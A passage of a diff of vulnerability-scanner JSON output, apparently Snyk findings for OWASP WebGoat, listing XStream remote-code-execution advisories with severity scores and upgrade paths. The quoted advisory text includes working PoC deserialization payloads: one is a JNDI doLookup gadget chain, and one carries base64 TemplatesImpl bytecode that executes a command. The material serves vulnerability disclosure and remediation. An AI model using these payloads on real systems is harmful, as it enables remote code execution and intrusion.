                    \u003ccom.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/\u003e\r\n                        \u003c/outer-class\u003e\r\n                    \u003c/it\u003e\r\n                    \u003cin class='java.io.FileInputStream'\u003e\r\n                      \u003cfd/\u003e\r\n                      \u003cchannel class='sun.nio.ch.FileChannelImpl'\u003e\r\n                        \u003ccloseLock/\u003e\r\n                        \u003copen\u003etrue\u003c/open\u003e\r\n                        \u003cthreads\u003e\r\n                          \u003cused\u003e-1\u003c/used\u003e\r\n                        \u003c/threads\u003e\r\n                        \u003cparent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'\u003e\r\n                          \u003csockClient\u003e\r\n                            \u003cfileName\u003e/etc/hosts\u003c/fileName\u003e\r\n                            \u003cunlinkFile\u003etrue\u003c/unlinkFile\u003e\r\n                          \u003c/sockClient\u003e\r\n                          \u003cconnectionSync/\u003e\r\n                        \u003c/parent\u003e\r\n                      \u003c/channel\u003e\r\n                      \u003ccloseLock/\u003e\r\n                    \u003c/in\u003e\r\n                  \u003c/msg\u003e\r\n                \u003c/part\u003e\r\n              \u003c/dataSource\u003e\r\n            \u003c/message\u003e\r\n            \u003csatellites/\u003e\r\n            \u003cinvocationProperties/\u003e\r\n          \u003c/packet\u003e\r\n        \u003c/indexMap\u003e\r\n      \u003c/comparator\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cdynamic-proxy\u003e\r\n      \u003cinterface\u003ejava.lang.Comparable\u003c/interface\u003e\r\n      \u003chandler class='com.sun.xml.internal.ws.client.sei.SEIStub'\u003e\r\n        \u003cowner/\u003e\r\n        \u003cmanagedObjectManagerClosed\u003efalse\u003c/managedObjectManagerClosed\u003e\r\n        \u003cdatabinding class='com.sun.xml.internal.ws.db.DatabindingImpl'\u003e\r\n          \u003cstubHandlers\u003e\r\n            \u003centry\u003e\r\n              \u003cmethod\u003e\r\n                \u003cclass\u003ejava.lang.Comparable\u003c/class\u003e\r\n                \u003cname\u003ecompareTo\u003c/name\u003e\r\n                \u003cparameter-types\u003e\r\n                  \u003cclass\u003ejava.lang.Object\u003c/class\u003e\r\n                \u003c/parameter-types\u003e\r\n              \u003c/method\u003e\r\n              \u003ccom.sun.xml.internal.ws.client.sei.StubHandler\u003e\r\n                \u003cbodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'\u003e\r\n                  \u003cindices\u003e\r\n                    \u003cint\u003e0\u003c/int\u003e\r\n                  \u003c/indices\u003e\r\n                  \u003cgetters\u003e\r\n                    \u003ccom.sun.xml.internal.ws.client.sei.ValueGetter\u003ePLAIN\u003c/com.sun.xml.internal.ws.client.sei.ValueGetter\u003e\r\n                  \u003c/getters\u003e\r\n                  \u003caccessors\u003e\r\n                    \u003ccom.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2\u003e\r\n                      \u003cval_-isJAXBElement\u003efalse\u003c/val_-isJAXBElement\u003e\r\n                      \u003cval_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'\u003e\r\n                        \u003ctype\u003eint\u003c/type\u003e\r\n                        \u003cfield\u003e\r\n                          \u003cname\u003ehash\u003c/name\u003e\r\n                          \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                        \u003c/field\u003e\r\n                      \u003c/val_-getter\u003e\r\n                      \u003cval_-isListType\u003efalse\u003c/val_-isListType\u003e\r\n                      \u003cval_-n\u003e\r\n                        \u003cnamespaceURI/\u003e\r\n                        \u003clocalPart\u003ehash\u003c/localPart\u003e\r\n                        \u003cprefix/\u003e\r\n                      \u003c/val_-n\u003e\r\n                      \u003cval_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'\u003e\r\n                        \u003ctype\u003ejava.lang.String\u003c/type\u003e\r\n                        \u003cmethod\u003e\r\n                          \u003cclass\u003ejavax.naming.InitialContext\u003c/class\u003e\r\n                          \u003cname\u003edoLookup\u003c/name\u003e\r\n                          \u003cparameter-types\u003e\r\n                            \u003cclass\u003ejava.lang.String\u003c/class\u003e\r\n                          \u003c/parameter-types\u003e\r\n                        \u003c/method\u003e\r\n                      \u003c/val_-setter\u003e\r\n                      \u003couter-class\u003e\r\n                        \u003cpropertySetters\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eserialPersistentFields\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003e[Ljava.io.ObjectStreamField;\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eserialPersistentFields\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eCASE_INSENSITIVE_ORDER\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003ejava.util.Comparator\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eCASE_INSENSITIVE_ORDER\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eserialVersionUID\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003elong\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eserialVersionUID\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003evalue\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003e[",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -14480,7 +2148,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "0000003c-0000-4000-8000-00000000003c",
+          "key": "00000000-0000-0000-0000-000000000013",
           "locations": [
             {
               "package": {
@@ -14491,18 +2159,118 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 142
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
+          "problems": [
+            { "id": "GHSA-g5w6-mrj7-75h2", "source": "ghsa" },
+            { "id": "CWE-434", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T07:44:55.759327Z",
+              "credits": ["Ceclin and YXXX"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:20.273652Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:51:50.577496Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:46.448489Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.308411Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T07:43:43Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.99286",
+                "probability": "0.84542"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Nuclei Templates", "PoC in GitHub", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569177",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-14T05:04:02.380579Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:22.653112Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39141.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39141.yaml"
+                },
+                {
+                  "title": "PoC in GitHub",
+                  "url": "https://github.com/zwjjustdoit/Xstream-1.4.17"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2021-39141", "source": "cve" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 557 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "0000003c-0000-4000-8000-00000000003c",
+        "id": "00000000-0000-0000-0000-000000000013",
         "links": {},
         "relationships": {
           "fix": {
@@ -14516,11 +2284,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -14529,7 +2297,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000003c-0000-4000-8000-00000000003c",
+              "id": "00000000-0000-0000-0000-000000000013",
               "type": "fixes"
             }
           }
@@ -14539,50 +2307,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the form of improper ETag prefix validation when parsing ETags from the `If-Match` or `If-None-Match` request headers. An attacker can exploit this vulnerability to cause denial of service by sending a maliciously crafted conditional HTTP request.\r\n\r\n\r\n## Workaround\r\n\r\nUsers of older, unsupported versions could enforce a size limit on `If-Match` and `If-None-Match` headers, e.g. through a `Filter`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.38, 6.0.23, 6.1.12 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/bb17ad8314b81850a939fd265fb53b3361705e85)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/fe4fd004291a1f2704281eb839609cf9e2fb5bea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/33372)\n- [GitHub PR](https://github.com/spring-projects/spring-framework/pull/33370)\n- [GitHub PR](https://github.com/spring-projects/spring-framework/pull/33374)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38809)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='com.sun.java.util.jar.pack.PackageWriter$2'\u003e\r\n        \u003couter-class\u003e\r\n          \u003cverbose\u003e0\u003c/verbose\u003e\r\n          \u003ceffort\u003e0\u003c/effort\u003e\r\n          \u003coptDumpBands\u003efalse\u003c/optDumpBands\u003e\r\n          \u003coptDebugBands\u003efalse\u003c/optDebugBands\u003e\r\n          \u003coptVaryCodings\u003efalse\u003c/optVaryCodings\u003e\r\n          \u003coptBigStrings\u003efalse\u003c/optBigStrings\u003e\r\n          \u003cisReader\u003efalse\u003c/isReader\u003e\r\n          \u003cbandHeaderBytePos\u003e0\u003c/bandHeaderBytePos\u003e\r\n          \u003cbandHeaderBytePos0\u003e0\u003c/bandHeaderBytePos0\u003e\r\n          \u003carchiveOptions\u003e0\u003c/archiveOptions\u003e\r\n          \u003carchiveSize0\u003e0\u003c/archiveSize0\u003e\r\n          \u003carchiveSize1\u003e0\u003c/archiveSize1\u003e\r\n          \u003carchiveNextCount\u003e0\u003c/archiveNextCount\u003e\r\n          \u003cattrClassFileVersionMask\u003e0\u003c/attrClassFileVersionMask\u003e\r\n          \u003cattrIndexTable class='com.sun.javafx.fxml.BeanAdapter'\u003e\r\n            \u003cbean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'\u003e\r\n              \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n                \u003cdefault\u003e\r\n                  \u003c__name\u003ePwnr\u003c/__name\u003e\r\n                  \u003c__bytecodes\u003e\r\n                    \u003cbyte-array\u003eyv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==\u003c/byte-array\u003e\r\n                    \u003cbyte-array\u003eyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ\u003c/byte-array\u003e\r\n                  \u003c/__bytecodes\u003e\r\n                  \u003c__transletIndex\u003e-1\u003c/__transletIndex\u003e\r\n                  \u003c__indentNumber\u003e0\u003c",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework:spring-web",
-                  "version": "6.0.13"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000003d-0000-4000-8000-00000000003d",
+          "key": "00000000-0000-0000-0000-000000000014",
           "locations": [
             {
               "package": {
-                "name": "org.springframework:spring-web",
-                "version": "6.0.13"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 40
+          "problems": [
+            { "id": "GHSA-2q8x-2p7f-574v", "source": "ghsa" },
+            { "id": "CWE-434", "source": "cwe" },
+            { "id": "CVE-2021-39153", "source": "cve" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T07:39:00.056207Z",
+              "credits": ["Ceclin and YXXX"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:20.202713Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:12.80788Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:46.665032Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:58.619132Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T07:35:41Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.67811",
+                "probability": "0.00573"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569176",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:46.665032Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:22.884471Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39153.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
             }
-          },
-          "title": "Denial of Service (DoS)"
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 275 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "0000003d-0000-4000-8000-00000000003d",
+        "id": "00000000-0000-0000-0000-000000000014",
         "links": {},
         "relationships": {
           "fix": {
@@ -14590,21 +2446,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-web",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.2.9"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework:spring-web",
-                          "version": "6.1.12"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -14613,7 +2465,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000003d-0000-4000-8000-00000000003d",
+              "id": "00000000-0000-0000-0000-000000000014",
               "type": "fixes"
             }
           }
@@ -14623,50 +2475,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') through the handling of URL-encoded request path information on `ajp-listener`. An attacker can cause the server to process incorrect paths, leading to a disruption of service by sending specially crafted concurrent requests.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS 